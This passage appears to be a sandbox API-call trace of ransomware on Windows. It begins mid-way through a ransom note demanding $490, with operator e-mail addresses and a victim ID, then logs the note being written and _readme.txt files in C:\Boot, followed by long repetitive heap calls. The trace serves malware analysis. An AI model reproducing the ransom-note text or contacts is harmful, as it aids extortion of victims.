50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.643] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.645] CloseHandle (hObject=0x690) returned 1 [0173.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.645] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.645] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.646] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.646] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e48cf40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.646] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e48cf40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e48cf40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e48cf40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.646] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.646] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.653] HeapFree (in: 